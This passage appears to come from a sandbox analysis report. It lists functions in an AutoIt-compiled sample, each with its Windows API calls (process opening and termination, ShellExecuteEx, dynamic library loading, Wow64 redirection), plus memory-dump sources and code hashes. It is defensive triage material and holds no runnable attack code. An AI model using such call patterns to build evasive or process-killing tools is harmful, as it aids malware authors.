                                                                      • Instruction Fuzzy Hash: 4CF0CD3550468067C22227357C46F5FA5D7EFE27A1F2445B7F864923E2FF6488015271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C38A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                        • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C38A4E
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00C38A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C38A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00C38A80
                                                                      • EndPath.GDI32(?), ref: 00C38A90
                                                                      • StrokePath.GDI32(?), ref: 00C38AA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      • Opcode ID: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                                      • Instruction ID: 953d6ab4f93fa86e8809979c1f9f316ee5eec4618055c58f9910fda41a64e137
                                                                      • Opcode Fuzzy Hash: ec1dca2212c91a7755f5bcd00fbd69f45d9511900370a60657bebd63e24bbf2c
                                                                      • Instruction Fuzzy Hash: AF11C97601014DFFDB129F94DC88FAE7F6DEB08354F048052BA19AA1A1C7719E55DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C05218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C05229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C05230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C05238
                                                                      • MulDiv.KERNEL32 ref: 00C0524F
                                                                      • MulDiv.KERNEL32 ref: 00C05261
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      • Opcode ID: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                                      • Instruction ID: a14a596e33b08468d26639d701c90f97fcc69b057d10d8d9e2e15b45a9482105
                                                                      • Opcode Fuzzy Hash: 7af4ca61c170ed5fb4d15625cf49087e31ac4284f4e17aef6bf05d9925b1b267
                                                                      • Instruction Fuzzy Hash: CF014F75A01719BBEB109BA59C89B5EBFB8EF48751F044065FA04E7291D6709900CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID:
                                                                      • API String ID: 4278518827-0
                                                                      • Opcode ID: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                                      • Instruction ID: 37a869a46f8b19288a6e39e61a6df53e70984358f0d6e0a265d208b73761cc0f
                                                                      • Opcode Fuzzy Hash: 1e9ce2bd9a7790f6b6dfde947b681316539b74e35ec8a72bfeb2668823d89610
                                                                      • Instruction Fuzzy Hash: 190144B0902B5ABDE3008F6A8C85B56FEA8FF19354F00411BA15C4BA42C7B5A864CBE5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32 ref: 00C0EB30
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C0EB46
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C0EB55
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB64
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C0EB6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C0EB75
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                                      • Instruction ID: 6b629becbc261f123aa8f9cefd4dcd18feeb5ea25f3134323eecd1bff76f88c2
                                                                      • Opcode Fuzzy Hash: a50323e71dbe50948b936bff4ed548883b7de563834627df36d62bdec0c5aa89
                                                                      • Instruction Fuzzy Hash: 69F03A72250158BBE7215B629C8EFEF3A7CEFCAB11F004158F611E1091D7A05A01DBB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BF7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClientRect.USER32 ref: 00BF7452
                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00BF7469
                                                                      • GetWindowDC.USER32(?), ref: 00BF7475
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00BF7484
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00BF7496
                                                                      • GetSysColor.USER32 ref: 00BF74B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                      • String ID:
                                                                      • API String ID: 272304278-0
                                                                      • Opcode ID: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                                      • Instruction ID: 4f6c9aa1bdf2eaab19c99ba33b6420cb25febf3572f637629be4b14b1d3c7ca0
                                                                      • Opcode Fuzzy Hash: 5e32bee735f654ad09df211eb6335d77ce95cd48a572e0c21815edac7c389e5f
                                                                      • Instruction Fuzzy Hash: FA014B31410619EFEB515F64DC49BBE7BB5FB04311F5501A4FA16A31A1CF311E51AB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C0187F
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C0188B
                                                                      • CloseHandle.KERNEL32(?), ref: 00C01894
                                                                      • CloseHandle.KERNEL32(?), ref: 00C0189C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C018A5
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C018AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                                      • Instruction ID: 7c59a94b981d715b6b436e904d3bb4aba61807102083d38a0b2149049fad765a
                                                                      • Opcode Fuzzy Hash: 7a0476c533cd7de5e17986e327bd3b95fff389426f41493664f67c8e278e9927
                                                                      • Instruction Fuzzy Hash: 01E0E536014101BBDB015FA1ED8CB4EBF39FF4AB22B108220F225A1070CB329430EF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00C2AEA3
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00C2AF38
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2AF67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 146682121-1426351568
                                                                      • Opcode ID: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                                      • Instruction ID: 4086162e5bf82a8461742fb08f8f28c3fbe2088d1d29fd31bd7d58eddcfcf7e5
                                                                      • Opcode Fuzzy Hash: d0855c595828f6e5b9960082dd3d0902dd9b79ca3ab18e01d97f7186cb058095
                                                                      • Instruction Fuzzy Hash: 2C71AE71A04625DFCB14EF94D494A9EBBF0FF09310F048499E826AB762CB74EE45CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00C07206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C0723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00C0724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C072CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                                      • Instruction ID: f0c755907e4e39e46cde0a21008a9c601967225d72c2a026262a477fcfb4607b
                                                                      • Opcode Fuzzy Hash: a7d255914085328a2418eddea6c0310545fa79e5be122808232f56a83a747e41
                                                                      • Instruction Fuzzy Hash: 32418EB1A04204EFDF19CF54C984B9A7BA9EF44310F1581A9BD059F28AD7B0EE40DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C32F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C32F8D
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00C32F94
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C32FA9
                                                                      • DestroyWindow.USER32 ref: 00C32FB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 3529120543-1011021900
                                                                      • Opcode ID: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                                      • Instruction ID: 5582d86e00d19c700a595a23e761959cf1f5dbccf4dc4e314e90c0ffe2e9f19a
                                                                      • Opcode Fuzzy Hash: 389bc1b42b49ac70c795032b17e80794cfacfdf76cf5d7fe0ecf970ae245fc68
                                                                      • Instruction Fuzzy Hash: A321AC72224225ABEF205FA4DC81FBB77B9EB5D364F100628FA60E2190D771DC919760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4D8D
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002), ref: 00BC4DA0
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00BC4D1E,00BD28E9,?,00BC4CBE,00BD28E9,00C688B8,0000000C,00BC4E15,00BD28E9,00000002,00000000), ref: 00BC4DC3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                                      • Instruction ID: b423a1b96d8f2b2ce2444d8c4d0b6a3e84d4c3ce742370259c408c06eb50dad5
                                                                      • Opcode Fuzzy Hash: 2219bc8adec29cc25ff25690942328fa031ef0c2c16ce0ceb5f1a09e2febf9c2
                                                                      • Instruction Fuzzy Hash: 69F04F35A50208BBDB11AF90DC89FAEBBF5EF44751F0001A8F906A2260CB705E40DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E9C
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EAE
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-3689287502
                                                                      • Opcode ID: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                                      • Instruction ID: df97ec569fb9e49a3ffe69c765931d9b82328b6738db0bfd3f14d4879247aea4
                                                                      • Opcode Fuzzy Hash: ac9024a8dcc0339ce89c417eb619e88cd9040311c84faa0b6383224f6e97d24a
                                                                      • Instruction Fuzzy Hash: 6AE0C236A166225BD2321B25BC58B6FB698EFC3F63B050165FC01F3200DBE0CD0296E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E62
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E74
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 145871493-1355242751
                                                                      • Opcode ID: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                                      • Instruction ID: f2a1e799a9c1f0c618d615254cec66e12739eeef8beb83322db0e0582b45dcd2
                                                                      • Opcode Fuzzy Hash: e9620ecb38303c9d0eec66c53eaf18c57479239925123cb45bd47c91805ef39a
                                                                      • Instruction Fuzzy Hash: 4CD0C2365166215746321B247C48F8F7A98EFC2B113050161B801F2110CFA0CD0296D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00C2A427
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2A435
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2A468
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2A63D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
                                                                      • Instruction ID: 65c3ef6b10499b54b3c50abc484ca55d19446cfbec2e76529a1b7d4e84aa5f07
                                                                      • Opcode Fuzzy Hash: 4c74d1513bf2f82e7deccda05caed68875178bceb610894083697bfcc52f4930
